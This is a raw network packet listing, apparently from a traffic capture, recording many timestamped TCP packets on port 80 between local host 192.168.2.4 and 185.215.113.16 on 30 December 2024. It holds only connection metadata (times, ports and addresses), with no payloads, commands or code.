Dec 30, 2024 15:53:36.779279947 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779287100 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779300928 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779305935 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779323101 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779336929 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779341936 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779365063 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779669046 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779685020 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779699087 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779715061 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779721975 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779730082 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779746056 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779756069 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779762030 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779774904 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779778004 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779793024 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779803038 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779818058 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779833078 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779836893 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779848099 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779863119 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779879093 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779894114 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779896021 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779908895 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779915094 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779923916 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779938936 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779966116 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779969931 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779982090 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779997110 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780011892 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780025959 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780035973 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780042887 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780057907 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780066013 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780081034 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780081987 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780103922 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780119896 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780132055 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780137062 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780152082 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780174017 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780177116 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780189037 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780200005 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780220032 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780235052 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780237913 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780253887 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780268908 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780278921 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780283928 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780298948 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780313015 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780316114 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780325890 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780328035 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780343056 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780358076 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780371904 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780373096 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780392885 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780396938 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780407906 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780424118 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780435085 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780438900 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780453920 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780468941 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780471087 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780486107 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780498981 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780502081 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780538082 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780875921 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780891895 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780908108 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780922890 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780936956 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780952930 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780956984 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780967951 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780977011 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.780982971 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.780997992 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781018019 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.781021118 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781034946 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.781038046 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781054020 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781068087 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781084061 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781094074 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.781099081 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781114101 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781127930 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781135082 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.781143904 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781151056 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.781166077 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781173944 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.781181097 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781199932 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781212091 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.781225920 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781240940 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781255960 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781270981 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781285048 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.781285048 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781300068 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781316042 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781316996 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.781330109 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781341076 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.781347036 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781362057 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781371117 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.781378031 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781393051 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781408072 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781409979 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.781423092 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781429052 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.781439066 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781452894 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781470060 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.781498909 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.789149046 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794085979 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794105053 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794120073 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794133902 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794150114 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794164896 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794181108 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794189930 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794240952 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794241905 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794265032 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794281006 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794296026 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794312000 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794312954 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794327974 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794337988 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794342995 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794358015 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794367075 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794373989 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794392109 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794397116 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794430971 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794445038 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794460058 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794457912 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794473886 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794488907 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794496059 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794502974 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794527054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794528961 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794549942 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794550896 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794565916 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794580936 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794595957 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794596910 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794619083 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794694901 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794709921 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794723988 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794738054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794749022 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794753075 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794769049 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794784069 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794790030 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794797897 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794814110 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794815063 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794823885 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794828892 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794843912 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794858932 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.794859886 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.794883013 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795038939 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795053959 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795075893 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795090914 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795105934 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795120955 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795120001 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795135975 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795145988 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795150995 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795167923 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795181990 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795192003 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795197010 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795211077 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795216084 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795227051 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795243025 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795242071 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795257092 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795277119 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795279026 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795298100 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795300961 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795325041 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795335054 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795341015 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795356035 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795372009 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795386076 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795408010 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795540094 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795555115 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795568943 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795583963 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795610905 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795619965 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795624971 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795633078 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795639038 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795654058 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795665026 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795676947 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795691967 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795698881 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795710087 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795723915 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795739889 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795743942 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795753956 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795768023 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795783997 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795799017 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795814991 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795818090 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795830011 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795838118 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795844078 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795856953 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795859098 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795875072 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795883894 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.795888901 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.795912027 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796109915 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796125889 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796140909 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796154976 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796156883 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796180964 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796183109 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796197891 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796211958 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796220064 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796226978 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796241999 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796251059 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796257019 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796271086 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796287060 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796302080 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796305895 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796315908 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796330929 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796339035 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796345949 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796349049 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796361923 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796370029 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796376944 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796392918 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796396971 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796410084 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796417952 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796432018 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796447992 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796454906 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796464920 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796483994 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796658993 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796674013 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796688080 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796705961 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796721935 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796729088 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796736002 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796751022 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796760082 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796765089 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796780109 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796793938 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796802044 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796813011 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796825886 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796840906 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796857119 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796873093 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796883106 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796888113 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796902895 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796907902 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796917915 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796926022 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796932936 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796957970 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.796960115 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796983004 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.796999931 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797018051 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797023058 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797033072 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797048092 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797056913 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797072887 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797080994 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797089100 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797105074 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797117949 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797128916 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797147036 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797188044 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797203064 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797218084 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797230005 CET	49744	80	192.168.2.4	185.215.113.16
